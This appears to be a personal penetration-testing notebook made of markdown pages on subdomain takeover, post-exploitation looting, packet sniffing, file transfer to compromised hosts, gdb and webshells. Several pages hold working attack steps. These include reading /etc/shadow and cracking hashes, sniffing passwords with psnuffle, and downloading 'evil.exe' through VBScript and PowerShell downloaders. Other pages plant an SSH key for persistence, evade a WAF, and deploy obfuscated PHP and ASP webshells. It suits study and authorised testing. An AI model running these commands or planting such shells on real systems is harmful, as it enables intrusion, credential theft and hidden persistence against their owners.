-------------------------------------------------------------------------------- 1 | .markdown-section pre { 2 | background-color: #ddd; 3 | } 4 | 5 | .markdown-section code { 6 | background-color: #ddd; 7 | } -------------------------------------------------------------------------------- /subdomain_takeover.md: -------------------------------------------------------------------------------- 1 | # Subdomain Takeover 2 | 3 | This is a really cool attack. 4 | 5 | First you looks for all subdomains. Sometimes a company has forgotten about a subdomain. Like and old support system called `support.example.com`. And then the support-system that points to that domain gets removed. That means that we could start a service for support, and like it to that domain. And thereby controlling the domain. 6 | 7 | 8 | 9 | HackerOne reports 10 | 11 | https://hackerone.com/reports/114134 12 | https://hackerone.com/reports/109699 13 | 14 | https://blog.getwhitehats.com/being-a-developer-can-be-a-stressful-job-following-the-request-of-your-employer-creating-website-e96af56e51c3#.t3tqd5s0n 15 | http://yassineaboukir.com/blog/neglected-dns-records-exploited-to-takeover-subdomains/ 16 | https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/ -------------------------------------------------------------------------------- /tcp-dumps_on_pwnd_machines.md: -------------------------------------------------------------------------------- 1 | 2 | # Loot Linux 3 | 4 | ## Passwords and hashes 5 | 6 | First grab the passwd and shadow file. 7 | 8 | ```bash 9 | cat /etc/passwd 10 | cat /etc/shadow 11 | ``` 12 | 13 | We can crack the password using `john the ripper` like this: 14 | 15 | ``` 16 | unshadow passwd shadow > unshadowed.txt 17 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 18 | ``` 19 | 20 | ## Interesting files 21 | 22 | ``` 23 | #Meterpreter 24 | search -f *.txt 25 | search -f *.zip 26 | search -f *.doc 27 | search -f *.xls 28 | search -f config* 29 | search -f *.rar 30 | search -f *.docx 31 | search -f *.sql 32 | 33 | .ssh: 34 | .bash_history 35 | ``` 36 | 37 | ## Mail 38 | 39 | ``` 40 | /var/mail 41 | /var/spool/mail 42 | ``` 43 | 44 | ## Tcp-dump 45 | 46 | Fast command: 47 | 48 | ``` 49 | tcpdump -i any -s0 -w capture.pcap 50 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X 51 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X 52 | ``` 53 | 54 | First we need to figure out what interfaces the machine is using: `ifconfig`. Then we can just start tapping in on that and start to capture those packets. 55 | 56 | ### Commands and flags 57 | 58 | Let's start with the basics. 59 | `tcpdump` - this command will output all network traffic straight to the terminal. Might be hard to understand if there is a lot of traffic. 60 | 61 | `-A` - stands for Ascii, and output it in ascii. 62 | 63 | `-w file.pcap` - the w-flag will save the output into the filename of your choice. The traffic is stored in pcap-format, which is the standard packet-analysis-format. 64 | 65 | `-i any` - will capture traffic for all interfaces. 66 | 67 | `-D` - show list of all interfaces 68 | 69 | `-q` - be less verbose. Be more `quiet` 70 | 71 | `-s` - The default size that tcpdump captures is only 96 bytes. If you want it to capture more you have to define it yourself `-s0` gives you the whole packet. 72 | 73 | `-c` - count. Set how many packets you want to intercept. And then stop. Is useful if you have a non-interactive shell, this way to can capture packets without having to leave with `ctr-c`. 74 | 75 | `port 22` - only see traffic on a specific port. 76 | 77 | `-vvv` - Verbose. Depending on how verbose you want the output. 78 | 79 | ### Useful commands 80 | 81 | Lots of good stuff here 82 | http://www.rationallyparanoid.com/articles/tcpdump.html 83 | 84 | ``` 85 | tcpdump -i wlan0 -vvv -A | grep "GET" 86 | ``` 87 | This will grep all GET from the wlan0 interface. 88 | This will not get any SSL-encrypted traffic. 89 | 90 | ``` 91 | sudo tcpdump -i wlan0 src port 80 or dst port 80 -w port-80-recording.pcap 92 | sudo tcpdump -i eth0 src port 80 or dst port 80 -w port-80-recording.pcap 93 | ``` 94 | 95 | Print the traffic in hex with ascii interpretation. 96 | 97 | ``` 98 | tcpdump -nX -r file.pcap 99 | ``` 100 | 101 | Only record tcp-traffic 102 | 103 | ``` 104 | tcpdump tcp -w file.pcap 105 | ``` 106 | 107 | 108 | ### Sniffing for passwords 109 | 110 | Once we have dumped some of the traffic we can insert it into metasploit and run `psnuffle` on it. It can sniff passwords and usernames from **pop3**, **imap**, **ftp**, and **HTTP GET**. This is a really easy way to find usernames and passwords from traffic that you have already dumped, or are in the process of dumping. 111 | 112 | ``` 113 | use auxiliary/sniffer/psnuffle 114 | ``` 115 | 116 | https://www.offensive-security.com/metasploit-unleashed/password-sniffing/ 117 | 118 | 119 | 120 | ## References 121 | 122 | 123 | http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/ 124 | 125 | https://danielmiessler.com/study/tcpdump/ 126 | 127 | https://www.sans.org/reading-room/whitepapers/testing/post-exploitation-metasploit-pivot-port-33909 128 | 129 | http://jvns.ca/blog/2016/03/16/tcpdump-is-amazing/ 130 | -------------------------------------------------------------------------------- /text-injection.md: -------------------------------------------------------------------------------- 1 | # Text/content-injection 2 | 3 | 4 | Relevant hackerone reports: 5 | https://hackerone.com/reports/145853 6 | 7 | https://www.owasp.org/index.php/Content_Spoofing 8 | -------------------------------------------------------------------------------- /the_basics.md: -------------------------------------------------------------------------------- 1 | # The Basics 2 | 3 | In this chapter we will look at some basics, good stuff to know before we begin. The basics of how Windows work and the basics of Linux. 4 | 5 | It is also pretty useful to know how to cook together a simple bash-script, so we are going to look at some really simple bash operations. 6 | 7 | And a little bit about PowerShell, and the windows command line. PowerShell is becomming more and more important as a tool for hackers. So this chapters will probably keep expanding. 8 | 9 | Python is also the hackers friend, so I have included a little bit about some basic operations with python. 10 | 11 | Transferring files is also pretty fundamental. It could be placed in the post-exploit chapter, but I think it fits better here since it is necessary for any work between different machines. 12 | 13 | Vim is another thing that you can't live without. So can use it as your main editor for writing and editing code or notes, but even if you don't use it as your main editor you still need to know the basics of it in order to be able to edit files on your hacked machines. 14 | 15 | -------------------------------------------------------------------------------- /tips.md: -------------------------------------------------------------------------------- 1 | # Tips 2 | 3 | - Whenever you find a service always make sure you know if it is vulnerable or not. Be it ssh, ftp, server, front-end library or framework. And unpatched ssh-client can count as a bug in a bug bounty program. 4 | 5 | For example, se this bug report: 6 | https://hackerone.com/reports/139940 -------------------------------------------------------------------------------- /tools.md: -------------------------------------------------------------------------------- 1 | # Tools 2 | 3 | These are our tools: 4 | - ltrace 5 | - strings 6 | - file 7 | - objdump 8 | - gdb 9 | 10 | 11 | 12 | This is a great little trick. If you are working a lot with hexadecimal and you want to easily convert it to ascii you can write this in bash 13 | ``` 14 | echo 6a6548 | xxd -r -p 15 | ``` 16 | will print out: **jeH** 17 | xxd is a program that makes ascii into hexdumps. with the -r we can reverse it. 18 | 19 | ## Nasm to opcode 20 | 21 | If we want to convert an assembly instruction to opcode we can use this tool 22 | 23 | ``` 24 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 25 | 26 | nasm > JMP ESP 27 | 00000000 FFE4 jmp esp 28 | ``` 29 | 30 | 31 | ## Objdump 32 | Objdump is a program that outputs the assembly code of a compiled program. It ca be executed like this. 33 | example: 34 | ``` 35 | objdump -D myProgram 36 | objdump -M intel -d program_name ;This is to read the assembly in intel-syntax 37 | 38 | 39 | ``` 40 | 41 | ## GDB - GNU Debugger 42 | 43 | 44 | ###Setting breakpoints 45 | Sometimes you want the debugger to stop at a certain point in the program, so that you can investigate memory and stuff. We can set these breakpoints with the following command: 46 | 47 | Set a break at the main-function 48 | ``` 49 | break main 50 | ``` 51 | 52 | Set a break at that line. I think it is set before the line is executed. 53 | ``` 54 | break 10 55 | ``` 56 | 57 | **Show breakpoints** 58 | If you want to know which breakpoints you have set you can run: 59 | ``` 60 | info breakpoint 61 | info break 62 | info b 63 | ``` 64 | 65 | **Remove breakpoints** 66 | Will delete all breakpoints on line 9 67 | ``` 68 | clear 9 69 | ``` 70 | 71 | Run the program 72 | ``` 73 | run 74 | ``` 75 | 76 | Show code 77 | ``` 78 | list ; show code if you have compile it with the -g flag 79 | list 10` ; will show the code around line 10. five lines before, and five lines after. 80 | list 1,20 ; will list all lines between the numbers. 81 | ``` 82 | 83 | This shows the code in assembly. It is pretty much the same as running objdump. 84 | ``` 85 | disassemble main 86 | ``` 87 | 88 | Show info about instruct pointer 89 | ``` 90 | info register eip 91 | i r eip 92 | ``` 93 | On 64bit machines it is called `rip`instead of `eip`. It basically shows to what address eip is pointing at. So the output might be something like this: 94 | ``` 95 | (gdb) i r rip 96 | rip 0x4004aa 0x4004aa 97 | ``` 98 | Which means that rip at this moment is pointing at 0x4004aa. Which means that this is going to be the next instruct that gets executed. 99 | 100 | The structure is like this: 101 | ``` 102 | examine/[format] address 103 | x/ 104 | ``` 105 | 106 | Format is how you want to display the memory. Here are the following formats: 107 | ``` 108 | o - octal 109 | x - hexadecimal 110 | d - decimal 111 | u - unsigned decimal 112 | t - binary 113 | f - floating point 114 | a - address 115 | c - char 116 | s - string 117 | i - instruction 118 | ``` 119 | 120 | Example: 121 | ``` 122 | x/s myVariable 123 | ``` 124 | This means: examine myVariable, and output the content in that memory in the form of a string. 125 | Now this does not work for values that does not have a memory address. It will just give you ` 126 | ``` 127 | 0x16: Cannot access memory at address 0x16 128 | ``` 129 | That is because the variable is not a pointer (it does not point to an memory-address), but instead it is a hardcoded value. 130 | 131 | ``` 132 | x/i $rip 133 | ``` 134 | Examine/info instruction pointer register. This command can be used to examine a specific part of memory. In this example it was the instruct pointer, but it can also be a specific address in memory. 135 | 136 | 137 | ### Show all functions 138 | 139 | 140 | ``` 141 | info funcions 142 | ``` 143 | 144 | **Python** 145 | Python can be quite useful go generate strings as input. Of course this can be done with a lot of other languages. so it would work like this. 146 | ``` 147 | ./myProgram $(python -c 'print "\x41" * 30') 148 | ``` 149 | Basically, the `$(python)` creates a shell within our command. And in that shell we run the normal python command. The `-c` flag tells python that we are going to run a command instead of opening up the interactive shell. You can test this in the terminal like this: 150 | ``` 151 | $ python -c 'print "hello" * 100' 152 | hellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohellohello 153 | ``` 154 | 155 | 156 | #### GCC 157 | Compile the program in debugger mode, so that the debugger has access to the code. 158 | ``` 159 | gcc -g program.c 160 | ``` 161 | 162 | -------------------------------------------------------------------------------- /tools_of_the_trade.md: -------------------------------------------------------------------------------- 1 | # Tools of the trade 2 | 3 | Here is just a collection of some tools that I use that I want to have an easy manual for. -------------------------------------------------------------------------------- /transfering_files.md: -------------------------------------------------------------------------------- 1 | # Transferring Files on Linux 2 | 3 | ## Set Up a Simple Python Webserver 4 | 5 | For the examples using `curl` and `wget` we need to download from a web-server. This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999. 6 | 7 | ``` 8 | python -m SimpleHTTPServer 9999 9 | ``` 10 | 11 | ## Wget 12 | 13 | You can download files using `wget` like this: 14 | 15 | ``` 16 | wget 192.168.1.102:9999/file.txt 17 | ``` 18 | 19 | ## Curl 20 | 21 | ``` 22 | curl -O http://192.168.0.101/file.txt 23 | ``` 24 | 25 | ## Netcat 26 | 27 | Another easy way to transfer files is by using netcat. 28 | 29 | If you can't have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can't do `ctr-c` because that will kill your session. 30 | 31 | So instead you can connect from the target machine like this. 32 | 33 | On attacking machine: 34 | 35 | ```bash 36 | nc -lvp 4444 < file 37 | ``` 38 | 39 | On target machine: 40 | 41 | ```bash 42 | nc 192.168.1.102 4444 > file 43 | ``` 44 | 45 | You can of course also do it the risky way, the other way around: 46 | 47 | So on the victim-machine we run `nc` like this: 48 | 49 | ```bash 50 | nc -lvp 3333 > enum.sh 51 | ``` 52 | 53 | And on the attacking machine we send the file like this: 54 | 55 | ```bash 56 | nc 192.168.1.103 < enum.sh 57 | ``` 58 | 59 | I have sometimes received this error: 60 | 61 | ``` 62 | This is nc from the netcat-openbsd package. An alternative nc is available 63 | ``` 64 | 65 | I have just run this command instead: 66 | 67 | ``` 68 | nc -l 1234 > file.sh 69 | ``` 70 | 71 | 72 | ## With php 73 | 74 | ``` 75 | echo "" > down2.php 76 | ``` 77 | 78 | ## Ftp 79 | 80 | If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!! 81 | 82 | ## Tftp 83 | 84 | On some rare machine we do not have access to `nc` and `wget`, or `curl`. But we might have access to `tftp`. Some versions of `tftp` are run interactively, like this: 85 | 86 | ``` 87 | $ tftp 192.168.0.101 88 | tftp> get myfile.txt 89 | ``` 90 | 91 | If we can't run it interactively, for whatever reason, we can do this trick: 92 | 93 | ``` 94 | tftp 191.168.0.101 <<< "get shell5555.php shell5555.php" 95 | ``` 96 | 97 | ### SSH - SCP 98 | 99 | If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files. 100 | 101 | So, in the `/home/user` directory you can find the hidden `.ssh` files by typing `ls -la`. 102 | Then you need to do two things. 103 | 104 | 1. Create a new keypair 105 | 106 | You do that with: 107 | 108 | ``` 109 | ssh-keygen -t rsa -C "your_email@example.com" 110 | ``` 111 | 112 | then you enter a name for the key. 113 | 114 | Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey 115 | Enter passphrase (empty for no passphrase): 116 | Enter same passphrase again: 117 | 118 | This will create two files, one called `nameOfMyKey` and another called `nameOfMyKey_pub`. The one with the `_pub` is of course your public key. And the other key is your private. 119 | 120 | 2. Add your public key to authorized_keys. 121 | 122 | Now you copy the content of `nameOfMyKey_pub`. 123 | On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized_keys. Like this 124 | 125 | ```bash 126 | echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys 127 | ``` 128 | 129 | 3. Log in. 130 | 131 | Now you should be all set to log in using your private key. Like this 132 | 133 | ``` 134 | ssh -i nameOfMyKey kim@192.168.1.103 135 | ``` 136 | 137 | ### SCP 138 | 139 | Now we can copy files to a machine using `scp` 140 | 141 | ``` 142 | # Copy a file: 143 | scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext 144 | 145 | # Copy a directory: 146 | scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination 147 | ``` -------------------------------------------------------------------------------- /transfering_files2.md: -------------------------------------------------------------------------------- 1 | # Transferring Files 2 | 3 | This section could easily be put in the post-exploitation section. But I consider this knowledge so fundamental that I chose to put it here. 4 | 5 | 6 | -------------------------------------------------------------------------------- /transfering_files_to_windows.md: -------------------------------------------------------------------------------- 1 | # Transferring Files to Windows 2 | 3 | Transferring files to Linux is usually pretty easy. We can use `netcat`, `wget`, or `curl`, which most systems have as default. But windows does not have these tools. 4 | 5 | ## FTP 6 | 7 | Most windows machines have a ftp-client included. But we can't use it interactively since that most likely would kill our shell. So we have get around that. We can however run commands from a file. So what we want to do is to echo out the commands into a textfile. And then use that as our input to the ftp-client. Let me demonstrate. 8 | 9 | On the compromised machine we echo out the following commands into a file 10 | 11 | ``` 12 | echo open 192.168.1.101 21> ftp.txt 13 | echo USER asshat>> ftp.txt 14 | echo mysecretpassword>> ftp.txt 15 | echo bin>> ftp.txt 16 | echo GET wget.exe>> ftp.txt 17 | echo bye>> ftp.txt 18 | ``` 19 | 20 | Then run this command to connect to the ftp 21 | 22 | ``` 23 | ftp -v -n -s:ftp.txt 24 | ``` 25 | 26 | Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword. 27 | 28 | ## TFTP 29 | 30 | Works by default on: 31 | 32 | **Windows XP** 33 | 34 | **Windows 2003** 35 | 36 | A TFTP client is installed by default on windows machines up to Windows XP and Windows 2003. What is good about TFTP is that you can use it non-interactively. Which means less risk of losing your shell. 37 | 38 | Kali has a TFTP server build in. 39 | You can server up some files with it like this 40 | 41 | ``` 42 | atftpd --daemon --port 69 /tftp 43 | /etc/init.d/atftpd restart 44 | ``` 45 | 46 | Now you can put stuff in `/srv/tftp` and it will be served. Remember that TFTP used UDP. So if you run `netstat` it will not show it as listening. 47 | 48 | You can see it running like this 49 | 50 | ``` 51 | netstat -a -p UDP | grep udp 52 | ``` 53 | 54 | So now you can upload and download whatever from the windows-machine like this 55 | 56 | ``` 57 | tftp -i 192.160.1.101 GET wget.exe 58 | ``` 59 | 60 | If you like to test that the tftp-server is working you can test it from Linux, I don't think it has a non-interactive way. 61 | 62 | ``` 63 | tftp 192.160.1.101 64 | GET test.txt 65 | ``` 66 | 67 | I usually put all files I want to make available in `/srv/tftp` 68 | 69 | If you want to make sure that the file was uploaded correct you can check in the syslog. Grep for the IP like this: 70 | 71 | `grep 192.168.1.101 /var/log/syslog` 72 | 73 | ## VBScript 74 | 75 | Here is a good script to make a wget-clone in VB. 76 | 77 | If it doesn't work try piping it through unix2dos before copying it. 78 | 79 | ``` 80 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 81 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 82 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 83 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 84 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 85 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 86 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs 87 | echo Err.Clear >> wget.vbs 88 | echo Set http = Nothing >> wget.vbs 89 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 90 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 91 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 92 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 93 | echo http.Open "GET",strURL,False >> wget.vbs 94 | echo http.Send >> wget.vbs 95 | echo varByteArray = http.ResponseBody >> wget.vbs 96 | echo Set http = Nothing >> wget.vbs 97 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 98 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs 99 | echo strData = "" >> wget.vbs 100 | echo strBuffer = "" >> wget.vbs 101 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 102 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs 103 | echo Next >> wget.vbs 104 | echo ts.Close >> wget.vbs 105 | ``` 106 | 107 | You then execute the script like this: 108 | ``` 109 | cscript wget.vbs http://192.168.10.5/evil.exe evil.exe 110 | ``` 111 | 112 | ## PowerShell 113 | 114 | This is how we can download a file using PowerShell. Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script: 115 | 116 | ``` 117 | echo $storageDir = $pwd > wget.ps1 118 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1 119 | echo $url = "http://192.168.1.101/file.exe" >>wget.ps1 120 | echo $file = "output-file.exe" >>wget.ps1 121 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 122 | ``` 123 | 124 | Now we invoke it with this crazy syntax: 125 | 126 | ```powershell 127 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 128 | ``` 129 | 130 | ## Debug.exe 131 | 132 | This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`. 133 | 134 | `Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that: 135 | 136 | ``` 137 | upx -9 nc.exe 138 | ``` 139 | 140 | Now it only weights 29 kb. Perfect. So now let's disassemble it: 141 | 142 | ``` 143 | wine exe2bat.exe nc.exe nc.txt 144 | ``` 145 | 146 | Now we just copy-past the text into our windows-shell. And it will automatically create a file called nc.exe 147 | 148 | -------------------------------------------------------------------------------- /users.md: -------------------------------------------------------------------------------- 1 | # Users 2 | 3 | 4 | social-searcher.com 5 | 6 | Reddit 7 | Snoopsnoo 8 | -------------------------------------------------------------------------------- /vim.md: -------------------------------------------------------------------------------- 1 | # Vim 2 | 3 | [http://www.viemu.com/a-why-vi-vim.html](http://www.viemu.com/a-why-vi-vim.html) 4 | And also this classic answer: [https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim](https://stackoverflow.com/questions/1218390/what-is-your-most-productive-shortcut-with-vim) 5 | 6 | ## Core concepts 7 | 8 | In vim you have the concept of buffers. 9 | 10 | ```bash 11 | # List buffers 12 | :buffers 13 | 14 | # Switch buffer 15 | # By number 16 | b1 17 | b2 18 | # By name 19 | b [name] 20 | 21 | 22 | # Close/delete a buffer 23 | :bdelete 24 | :bd 25 | ``` 26 | 27 | ## Movement - Motion commands 28 | 29 | **Left,up,down,right** 30 | 31 | `hjkl` 32 | 33 | **start of line** 34 | 35 | `0` \(zero\) 36 | 37 | **end of line** 38 | 39 | `$` 40 | 41 | **beginning of next word** 42 | 43 | `w` 44 | 45 | **beginning of next word, defined by white space** 46 | 47 | `W` 48 | 49 | **end of the next word** 50 | 51 | `e` 52 | 53 | **end of the next word, defined by white space** 54 | 55 | `E` 56 | 57 | **back to the beginning of previous word** 58 | 59 | `b` 60 | 61 | **back to the end of previous word** 62 | 63 | `B` 64 | 65 | **go to next character of your choice** 66 | 67 | If you want to go to the next comma 68 | 69 | `f,` 70 | 71 | **start of file** 72 | 73 | `gg` 74 | 75 | **end of file** 76 | 77 | `G` 78 | 79 | ## Operators 80 | 81 | Operators are commands that do things. Like delete, change or copy. 82 | 83 | `c` - change 84 | `ce` - change until end of the word. 85 | `c$` - change until end of line. 86 | 87 | ## Combining Motions and Operators 88 | 89 | Now that you know some motion commands and operator commands. You can start combining them. 90 | 91 | `dw` - delete word 92 | `d$` - delete to the end of the line 93 | 94 | ## Count - Numbers 95 | 96 | You can add numbers before motion commands. To move faster. 97 | 98 | `4w` - move cursor three words forward 99 | `0` - move curso to the start of the line 100 | 101 | You can use numbers to perform operations. 102 | `d3w` - delete three words 103 | 104 | `3dd` - delete three lines 105 | 106 | ## Replace 107 | 108 | If you need to replace a character, there is no need to enter insert-mode. You can just use replace 109 | 110 | Go to a character and the press `r` followed by the character you want instead. 111 | 112 | `rp` if you want to replace p. 113 | 114 | `R` 115 | 116 | ## Clipboard 117 | 118 | In order to copy something FROM vim to the OS-clipboard you can do this: 119 | 120 | The `"` means that we are not entering a registry. And the `*` means the OS-clipboard. So we are yanking something and putting it in the OS-clipboard registry. 121 | 122 | ``` 123 | "*y 124 | ``` 125 | 126 | ## Substitute - Search and replace 127 | 128 | :s/thee/the/g 129 | 130 | ## Entering insert-mode 131 | 132 | `i` - current character 133 | `o` - next line 134 | `O` - line before 135 | `a` - end of word 136 | `A` - end of line 137 | 138 | ## .vimrc 139 | 140 | Here is all your vim-configuration. 141 | 142 | ## Plugins 143 | 144 | Install vundle here 145 | [https://github.com/VundleVim/Vundle.vim](https://github.com/VundleVim/Vundle.vim) 146 | 147 | **Add plugin** 148 | 149 | Add plugin to your .vimrc-file and then open vim and write 150 | 151 | `:PluginInstall` 152 | 153 | -------------------------------------------------------------------------------- /vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # Vulnerabilities 2 | 3 | There are a number of different common vulnerabilities that are found in binaries. In this chapter we are going to discuss some of the common ones. 4 | 5 | The main idea behind these exploits is to corrupt the memory allocation to inject arbitrary code that gets executed by the program. 6 | 7 | -------------------------------------------------------------------------------- /vulnerability_analysi.md: -------------------------------------------------------------------------------- 1 | # Vulnerability analysis 2 | 3 | -------------------------------------------------------------------------------- /vulnerability_analysi1s.md: -------------------------------------------------------------------------------- 1 | # Vulnerability analysis 2 | 3 | So now you have done your recon and found services and their versions. You have looked in every corner of the target. Enumerated subdomains, scanned them, browsed through the webpage looking everywhere. 4 | 5 | So, now it is time to see if any of these services contains any vulnerabilities. 6 | -------------------------------------------------------------------------------- /vulnerability_analysis.md: -------------------------------------------------------------------------------- 1 | # Vulnerability analysis 2 | 3 | -------------------------------------------------------------------------------- /waf_-_web_application_firewall.md: -------------------------------------------------------------------------------- 1 | # WAF - Web application firewall 2 | 3 | 4 | One of the first things we should do when starting to poke on a website is see what WAF it has. 5 | 6 | ## Identify the WAF 7 | 8 | ``` 9 | wafw00f http://example.com 10 | ``` 11 | 12 | http://securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html 13 | -------------------------------------------------------------------------------- /web-scanning.md: -------------------------------------------------------------------------------- 1 | # Find hidden files and directories 2 | 3 | ## TLDR 4 | 5 | ``` 6 | # Dirb 7 | dirb https://192.168.1.101 8 | 9 | # Gobuster - remove relevant responde codes (403 for example) 10 | gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 11 | ``` 12 | 13 | ## About 14 | 15 | There is essentially no way for a user to know which files are found in which directories on a web-server, unless the whole server has directory listing by default. However, if you go directly to the page it will be shown. So what the attacker can do is to brute force hidden files and directories. Just test a bunch of them. There are several tools for doing this. The attack is of course very noisy and will show up fast in the logs. 16 | 17 | ### Dirb 18 | 19 | This is a really easy tool to use: 20 | 21 | ``` 22 | dirb http://target.com 23 | ``` 24 | 25 | ### Dirbuster 26 | 27 | It is a GUI 28 | You start it with: 29 | 30 | ``` 31 | dirbuster 32 | ``` 33 | 34 | ### OWASP ZAP 35 | 36 | Insert your target. 37 | Add it to the context 38 | Click the plus-sign 39 | Click on Forced Browse 40 | 41 | ### Wfuzz 42 | 43 | You can find the manual by typing: 44 | ``` 45 | wfuzz -h 46 | ``` 47 | 48 | ``` 49 | wfuzz -c -z file,/root/.ZAP/fuzzers/dirbuster/directory-list-2.3-big.txt --sc 200 http://pegasus.dev:8088/FUZZ.php 50 | ``` 51 | 52 | ### Gobuster 53 | 54 | ``` 55 | # Gobuster - remove relevant responde codes (403 for example) 56 | gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 57 | ``` 58 | 59 | ## WAF - Web application firewall 60 | 61 | It might be that dirb shows you 403 errors, instead of the expected 404. This might mean that there is a WAF protecting the site. To get around it we might have to change our request header to it looks more like a normal request. 62 | 63 | ``` 64 | dirb http://target.com -a "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36" 65 | ``` 66 | -------------------------------------------------------------------------------- /web-services.md: -------------------------------------------------------------------------------- 1 | # Web-services 2 | 3 | Vulnerabilities on the web can cause many different times of hacks. You can use it to get access to another users data. Or it can work as a step towards remote code execution. 4 | 5 | A great way to see real examples of specific attack you can check hackerone.com like this through google: 6 | 7 | ``` 8 | site:hackerone.com clickjacking 9 | ``` 10 | 11 | ## Visit OWASP top 10 12 | 13 | This chapter is largely based on the OWASP top 10 vulnerabilities. So if you want a better explanation just check out their website. 14 | https://www.owasp.org/index.php/Top_10_2013-Top_10 -------------------------------------------------------------------------------- /webshell.md: -------------------------------------------------------------------------------- 1 | # Webshell 2 | 3 | A webshell is a shell that you can access through the web. This is useful for when you have firewalls that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to function, you can't filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports since the traffic is hidden in the http traffic. 4 | 5 | You have access to different kinds of webshells on Kali here: 6 | 7 | ``` 8 | /usr/share/webshells 9 | ``` 10 | 11 | ## PHP 12 | 13 | This code can be injected into pages that use php. 14 | ```php 15 | 16 | # Execute one command 17 | 18 | 19 | # Take input from the url paramter. shell.php?cmd=whoami 20 | 21 | 22 | # The same but using passthru 23 | 24 | 25 | # For shell_exec to output the result you need to echo it 26 | 27 | 28 | # Exec() does not output the result without echo, and only output the last line. So not very useful! 29 | 30 | 31 | # Instead to this if you can. It will return the output as an array, and then print it all. 32 | 33 | 34 | # preg_replace(). This is a cool trick 35 | 36 | 37 | # Using backticks 38 | $output"; ?> 39 | 40 | # Using backticks 41 | 42 | ``` 43 | 44 | You can then call then execute the commands like this: 45 | 46 | ``` 47 | http://192.168.1.103/index.php?cmd=pwd 48 | ``` 49 | 50 | ### Make it stealthy 51 | 52 | We can make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters. The use tampterdata or burpsuite to insert the commands. Or just netcat or curl. 53 | 54 | ```php 55 | 56 | 57 | 58 | # I have had to use this one 59 | 60 | ``` 61 | 62 | ### Obfuscation 63 | 64 | The following functions can be used to obfuscate the code. 65 | 66 | ``` 67 | eval() 68 | assert() 69 | base64() 70 | gzdeflate() 71 | str_rot13() 72 | ``` 73 | 74 | ### Weevely - Incredible tool! 75 | 76 | Using weevely we can create php webshells easily. 77 | 78 | ``` 79 | weevely generate password /root/webshell.php 80 | ``` 81 | 82 | Not we execute it and get a shell in return: 83 | 84 | ``` 85 | weevely "http://192.168.1.101/webshell.php" password 86 | ``` 87 | 88 | ## ASP 89 | 90 | ``` 91 | <% 92 | Dim oS 93 | On Error Resume Next 94 | Set oS = Server.CreateObject("WSCRIPT.SHELL") 95 | Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True) 96 